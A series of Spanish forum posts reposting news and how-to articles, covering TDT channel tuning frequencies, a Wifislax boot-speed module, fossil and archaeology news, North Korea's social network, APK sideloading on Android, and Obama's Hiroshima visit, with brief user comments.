Tanto si quieres sintonizar el canal Gol en un televisor Samsung como si lo haces en uno de LG u otras marcas tendrás la opción de elegir diferentes fuentes para buscar canales. Si lo que quieres es sintonizar nuevos canales de la TDT deberás elegir como fuente la antena aérea y, en el caso de que tengas varias opciones, selecciona la antena digital.

A partir de ese momento el televisor buscará y sintonizará todos los canales de la TDT, un proceso que se puede prolongar durante varios minutos. Puede que al final tengas que confirmar la operación para tener acceso a los nuevos canales de la TDT, incluido el de Gol TV. 

Ordenar canales en un televisor Samsung / LG / Panasonic
La mala noticia es que probablemente esta resintonización alterará el orden de los canales, por lo que tendrás que volver a colocarlos en su sitio uno a uno. Por otra parte así podrás buscar el mejor hueco para el nuevo canal Gol TV.

Frecuencias del canal Gol en la TDT

Aunque la mayoría de televisores modernos están más que preparados para sintonizar automáticamente todos los canales de la TDT es probable que tengas algunos problemas para ver Gol si estás lejos de la señal del repetidor.

Siempre te queda la opción de intentar sintonizar el canal de Gol TV de manera manual, aunque te advertimos que el proceso suele ser algo complejo y tedioso. Una de las principales ventajas de la sintonización manual es que podrás colocar los nuevos canales en el número que prefieras sin perder el actual orden de tu lista.

Para realizar la sintonización manual primero debes acudir al menú de configuración del televisor y, probablemente en el apartado de emisión o instalación, seleccionar la sintonización manual de canales.

Con el objetivo de que puedas sintonizar el canal Gol gratis en la TDT de forma manual a continuación te dejamos una lista con los Mux de emisión del canal gestionado por Mediapro en cada provincia. Si no consigues ver el canal puedes probar a buscarlo en el Mux alguna región aledaña por si consigues mejor calidad de señal.

Provincia   Mux


Álava   36
Albacete   46
Alicante   42
Almería   32/58
Asturias   35
Ávila     47
Badajoz   49
Barcelona   47
Burgos   54/32
Cáceres   28/38
Cádiz     53
Cantabria   46
Castellón   46
Ceuta   53
Ciudad Real     32
Córdoba   44/58
Cuenca   32
Girona   38
Granada   40/29
Guadalajara   37
Guipúzcoa      44
Huelva      35
Huesca      44
Islas Baleares 27/47
Jaén           32
La Coruña   35/46
La Rioja   55/54
Las Palmas   35
León           54/52
Lleida           47
Lugo     44
Madrid   33
Málaga   39
Melilla   21
Murcia   42
Navarra   55
Orense   53
Palencia   54
Pontevedra   46
Salamanca   53
Segovia   53
Sevilla   44
Soria     22
Tarragona   47
Tenerife   23
Teruel   32
Toledo   47
Valencia   46
Valladolid   53
Vizcaya   36
Zamora   52
Zaragoza   22/32



Autor: Victor Perez Ro...

Bueno para los que os gustan el fútbol espero que os sirva, lo he publicado aquí no se si es el sitio adecuado si no es así moverlo.

Saludos. ;)
#1974
Descargar este archivo y extraerlo en la memoria usb: wifislax-fast-boot-v2.tar.gz https://mega.nz/#!88AnzBhL!bFLVc1K0xZlKKVSZX1vmcTH0UyT5pX18GmkQt2zVMqs

Al hacer esto se sobreescribe es archivo "/boot/initrd.xz" y se crea un módulo en "/wifislax/modules/wifislax-fast.boot.xzm"

En el initrd se ha eliminado un "sleep 3" después de mostrar el logo de wifislax, con esto ya ganamos 3 segundos.

El módulo wifislax-fast-boot modifica varios archivos en "/etc/rc.d", estos son los cambios:

- Se deshabilita el arranque automático de rc.cpufreq: Sirve para disminuir la frecuencia del procesador y así disminuir el consumo de batería en portatiles

- Se deshabilita el arranque automático de rc.hostapd: Sirve para crear un punto de acceso wifi

- Se deshabilita el arranque automático de rc.lighttpd: Sirve para crear un servidor web ligero

- Se deshabilita el arranque automático de rc.postgresql: Base de datos utilizada por aplicaciones que no vienen por defecto en la iso, por ejemplo metasploit

- Se deshabilita el arranque automático de rc.snort: Es un NIDS, sirve para crear reglas de firewall que detecten intrusiones o ataques en la red

- Se deshabilita el arranque automático de rc.wireless: Este servicio que sirve para configurar conexiones de red sin entorno gráfico

- Se ha optimizado el código de rc.S, rc.M y rc.local: Estos son los scripts que ponen en marcha el sistema operativo. Se ha reorganizado el código para que sea mas legible, y se ha optimizado el orden y la forma en la que se ponen en marcha los servicios del sistema, ahora la mayoría se ejecutan en modo silencioso y en segundo plano, lo que significa que no hay que esperar a que terminen de ponerse en marcha  cada uno de los servicios para continuar con el arranque del sistema.


En mi caso, en mi ordenador de sobremesa, antes tardaba 58 segundos en arrancar el sistema, desde que se ejecuta el kernel hasta que se puede ver el escritorio de kde, y ahora tarda 48 segundos, lo que se traduce en un arranque un 17% mas rápido  ;-) ;-)

Autor: geminis_demon


Lo he visto en la pagina hermana parece interesante el Modulo ya me contaréis.

http://foro.seguridadwireless.net/colaboracion-y-desarrollo-de-nuestras-lives/optimizando-rc-d-arranque-de-wifislax-un-17-mas-rapido/
#1975

Investigadores chinos han descrito una nueva hormiga extraña, 'Ceratomyrmex ellenbergeri', que vivió hace 99 millones de años, preservada en ámbar birmano.

El ejemplar exhibe un cuerno prominente y mandíbulas de gran tamaño que se extendían por encima de la cabeza. Estas estructuras supuestamente funcionaban como una trampa altamente especializada para presas de gran tamaño. El cuerno es resultado de una modificación extrema del clypeus, inédito entre las hormigas vivas y extintas, lo que demuestra la temprana morfogénesis de esta mordaza exagerada entre las hormigas.

Junto con otras hormigas cretácicas, el nuevo fósil sugiere que al menos algunas de las primeras Formicidas eran depredadoras especialistas solitarias. Además, demuestra que poco después de la llegada de las sociedades de hormigas en el Cretácico Inferior, al menos un linaje, las Haidomyrmecini, se volvió experta para la captura de presas, evolucionando de forma independiente en especializaciones morfológicas que se perderían millones de años después de su desaparición, cerca del Mesozoico.

La condición exagerada en el nuevo fósil revela una aptitud para el transporte de presas de cuerpo grande con exclusión de presas más pequeñas, y pone de relieve un conjunto más complejo y diversificado de las características ecológicas de las primeras hormigas.

El estudio, dirigido por Wang Bo, del Instituto Nanjing de Geología y Paleontología de la Academia China de Ciencias, ha sido publicado en línea en la revista 'Current Biology'.


http://www.europapress.es/ciencia/ruinas-y-fosiles/noticia-evidencias-hormigas-depredadoras-solitarias-cretacico-20160601150034.html
#1976

Científicos declaran que la hoja de uno de los dos puñales encontrados en la tumba del faraón Tutankamón procede de un material extraterrestre.

Un grupo de investigadores internacionales de Italia y Egipto publicaron un artículo en la revista 'Meteoritics and Planetary Science' que hizo las delicias de los aficionados a la egiptología. Los científicos afirman, que uno de los dos puñales encontrados junto a la tumba del joven faraón Tutankamón es de procedencia extraterrestre. El material para su elaboración proviene de un meteorito.

Los antiguos egipcios consideraban el hierro un metal más valioso que el oro, ya que, no disponían de minas y no habían desarrollado una cultura de tratamiento de ese metal como en otras culturas antiguas. Así que el origen del hierro de la hoja de los puñales había sido un enigma desde que descubrieron la tumba del joven faraón en el año 1922.

A través de un análisis utilizando la técnica de fluorescencia con rayos X, el equipo internacional de investigadores ha confirmado que la composición del hierro de los puñales tiene concentraciones distintas de cobalto y níquel respecto al porcentaje típico y se asemeja más al hierro procedente de meteoritos.


http://www.lavanguardia.com/cultura/20160528/402110674569/punal-tutankamon-extraterrestre.html
#1977





Así luce Startcon, la red social de Corea del Norte. ¿Se parece a Facebook?. (Foto: Captura/ motherboard)



El régimen comunista de Corea del Norte, presidido por Kim Jong-un, se encuentra trabajando en Startcon, una red social que tendrá un look muy similar a Facebook, la famosa página creada por Mark Zuckerberg, así lo afirma el portal Motherboard.

Como se sabe, el uso de Internet, así cómo de portales como Facebook, Twitter y Google, está prohibido en Corea del Norte; sin embargo, Kim Jong-un habría mandado elaborar esta red social para sus ciudadanos.

De acuerdo a la publicación, la interfaz de Startcon, como se llama este clon norcoreano de Facebook, es muy similar a la red social creada por Mark Zuckerberg, ya que copio los colores y algunas características esenciales.


Por el momento, se desconoce cuantos ciudadanos de Corea del Norte están registradas en esta red social; sin embargo, Motherboard asegura que Startcon pronto será presentado oficialmente, ya que está en modo de prueba.

Te invitamos a revisar nuestra galería con algunas capturas de esta nueva red social que acaba de crear el régimen de Corea del Norte. ¿Se parece a Facebook? Déjanos un comentario con tu opinión.


http://eju.tv/2016/05/corea-del-norte-crea-version-facebook-luce-asi/


Yo lo veo igual solo que le ha cambiado unas cuantas chorradas a la interfaz de fecebook desde luego son mas poco originales estos coreano solo saben copiar. :xD
#1978
1: Instala los drivers de tu móvil en el ordenador

Cada teléfono móvil, cada fabricante, cada dispositivo, tiene unos drivers. Son necesarios para que tu ordenador lo reconozca al conectarlo vía USB y para poder trabajar con él. De no tenerlos debidamente instalados y actualizados puedes tener problemas a lo largo del proceso.


Habitualmente, al conectar tu dispositivo al PC, el asistente de Windows -si es tu sistema operativo- los buscará e instalará automáticamente. Es cuestión de pocos segundos, así que no te preocupes porque en breve podrás disfrutar plenamente de tu teléfono móvil.

En caso de no lograr instalar los controladores o drivers de forma automática, puedes hacerlo manualmente. En la web del fabricante suelen estar disponibles para descarga. No sólo los fabricantes de móviles los tienen, sino los de teclados, discos duros y otros periféricos.

2: Permitir ubicaciones falsas

Ahora viene un paso que probablemente no imaginabas. Debes activar las opciones de desarrollador de tu smartphone. Para ello, en Android 5.0 Lollipop y superiores tienes que ir al menú de ajustes, a la pestaña de Acerca del teléfono  allí localizar el Número de compilación.


A continuación tienes que pulsar rápidamente en diez ocasiones sobre el número. Irá apareciendo un aviso flotante conforme nos acercamos al número total. Al finalizar, habremos activado las Opciones de desarrollador, que aparecerán en el menú de ajustes.

Mucho cuidado a la hora de manejar estas opciones, pues están pensadas para usuarios avanzados de Android. Por el momento no hay más que acceder a ellas y habilitar la opción de Permitir ubicaciones falsas / de prueba.

3: Transferir el archivo .apk

Ahora nuestro móvil ya está listo para la acción. Sólo nos queda localizar la aplicación que queremos instalar y transferirla al dispositivo.

Debemos tener preparado el archivo .apk, la extensión que identifica a los instaladores de aplicaciones en Android. Cada aplicación tiene su .apk correspondiente, aunque no todos están disponibles, pues las aplicaciones que cuestan de pago suelen proteger el suyo.


Una vez que nos hayamos seleccionado el fichero .apk de la app que queremos instalar en nuestro dispositivo, lo copiamos y la pegamos dentro de cualquier carpeta de nuestro móvil. Es fácil puesto que una vez conectado al PC vía USB, funcionará como cualquier otro dispositivo de almacenamiento masivo.

4: Instalar la app

Tras extraer de forma segura nuestro dispositivo, queda el paso final: instalar el .apk. Necesitaremos un explorador de archivos, aunque el que viene de serie con Android servirá. Lo abrimos y localizamos el archivo .apk en el directorio donde lo hayamos copiado o cortado.


Al ejecutarlo, nos preguntará por el proceso con el que queremos ejecutarlo. El instalador de Android es la opción más efectiva y fiable. Sólo resta confirmar y esperar a que la aplicación termine de instalarse.

Podremos acceder a ella desde el cajón de aplicaciones o desde el acceso directo que se crea automáticamente en el escritorio.

Autor: Eduardo Álvarez

Espero que os sirva. ;)
#1979
Comandos estadounidenses a bordo de una camioneta artillada en la localidad siria de Fatisah. Uno de ellos muestra en una manga el emblema de las milicias kurdas de Siria, las YPG (AFP)



Los que llevan en su uniforme estos soldados estadounidenses que luchan en Siria. Pertenecen a la Unidades de protección del pueblo, el YPG. Una milicia kurdo-siria que combate junto a las fuerzas estadounidenses contra el Dáesh, pero considerada grupo terrorista por Ankara.

"La cuestión es que no está autorizada", dice este portavoz de la coalición militar internacional contra el EI en Siria e Irak. "Por lo que se les ordenó quitarse esas insignias. Por el momento no tengo constancia de ninguna otra reprimenda. Pero lo imporante es que la situación ha sido corregida, y hemos comunicado a nuestros aliados que esta conducta fue inapropia y no estaba autorizada".

Hipocresía, doble rasero, inaceptable, decía el ministro de Exteriores turco para calificar lo ocurrido, echando mano de la ironía.

"Les sugerimos que también lleven las insignias del Dáesh, Al-Nusra y Al Qaeda durante sus operaciones en otras regiones de Siria. Y la de Boko Haram cuando vayan a África, si no consideran al YPG un grupo terrorista como los otros".

Washington sí considera como grupo terrorista al PKK, el Partido de los Trabajadores del Kurdistán, pero no al YPG, su rama siria. Muy al contrario, constituye un importante aliado en este paísh, que ha expulsado al Dáesh de muchas localidades del norte durante los últimos meses.



http://es.euronews.com/2016/05/27/incidente-diplomatico-entre-estados-unidos-y-turquia-por-culpa-de-unos-parches/

Pues me parece bien que apoye a los kurdos si es verdad que es así por que están combatiendo al mismo enemigo que son el Estado Islámico.

#1980
La visita del mandatario es la primera de un presidente de EEUU a la ciudad japonesa tras la bomba nuclear de 1945 que arrasó las vidas de más de 140.000 personas.


HIROSHIMA. -El presidente de EE.UU, Barack Obama, ha visitado hoy Hiroshima, 71 años después de que las tropas estadounidenses lanzaran sobre esa ciudad japonesa una bomba nuclear que mató de golpe a 140.000 personas durante la II Guerra Mundial.

"71 años han pasado desde aquel día. Era una mañana luminosa y sin nubes. La muerte cayó del cielo y el mundo cambió", dijo Obama al comenzar su discurso durante su visita a la ciudad nipona arrasada por una bomba atómica el 6 de agosto de 1945.

El mandatario estadounidense es el primer presidente de EEUU en activo en visitar Hiroshima. Obama ha participado en una ceremonia en el Parque de la Paz de la ciudad junto al primer ministro nipón, Shinzo Abe, en la que también han asistido al menos tres supervivientes del ataque.

Obama quiso recordar "las voces de las víctimas" de la tragedia, y destacó la necesidad de "mantener viva su memoria, porque alimenta nuestra imaginación, nos permite cambiar y nos da esperanzas sobre un futuro mejor".


No pide disculpas

En su discurso, el presidente se ha comprometido a luchar por un mundo libre de armas nucleares, pero no ha ofrecido una disculpa por las consecuencias del ataque de las tropas de EE.UU., tal y como le exigían algunos colectivos y organizaciones. El periódico Chugoku Shimbun, el principal diario local que se edita en Hiroshima, pidió en un editorial al presidente estadounidense que escuche a las víctimas de la bomba atómica.

"El pueblo de Hiroshima estará observando de cerca al presidente de EE.UU y escrutando si verdaderamente quiere avanzar en la abolición de las armas nucleares", reza el texto, que abarca cuatro páginas.

El Parque de la Paz permanecerá cerrado prácticamente todo el día por motivos de seguridad por lo que los ciudadanos de Hiroshima, donde se han desplegado estos días unos 4.600 agentes de policía, no podrán participar directamente en el evento.

La visita de Obama ha sido recibida con bastante entusiasmo en la ciudad, sobre todo por parte de los supervivientes que llevan mucho tiempo reclamándola y que la consideran una paso importante hacia la abolición de los arsenales nucleares.

El pasado abril, el secretario de Estado de EE.UU., John Kerry, participó en un acto en el Parque de la Paz junto a los ministros de Exteriores del G7 tras una reunión en la ciudad en la que se firmó una declaración que pedía conseguir avances para lograr una revisión del Tratado de No Proliferación (TNP) en 2020.

Aunque Obama será el primer presidente en el cargo en visitar Hiroshima, el demócrata Jimmy Carter lo hizo como expresidente en 1984, mientras que el republicano Richard Nixon acudió en 1964, cuatro años antes de convertirse en presidente de los EE.UU.

Tras el ataque a Hiroshima el 6 de agosto de 1945, Estados Unidos lanzó una segunda bomba nuclear tres días después sobre la ciudad de Nagasaki, donde murieron unas 74.000 personas, y seis días más tarde Japón se rindió y puso fin a la II Guerra Mundial.



http://www.publico.es/internacional/obama-visita-hiroshima-primera-visita.html


Lo acabo de ver en la noticias y como el japones le abraza llorando a obama pero me pregunto una cosa Japón pidió perdón por atacar pearl harbor ? Recordemos que hay fue cuando comenzó la Segunda Guerra Mundial.

Y debería pedir disculpa EEUU a Japón ? Con esto no quiero justificar la muerte de miles de persona por esa bomba.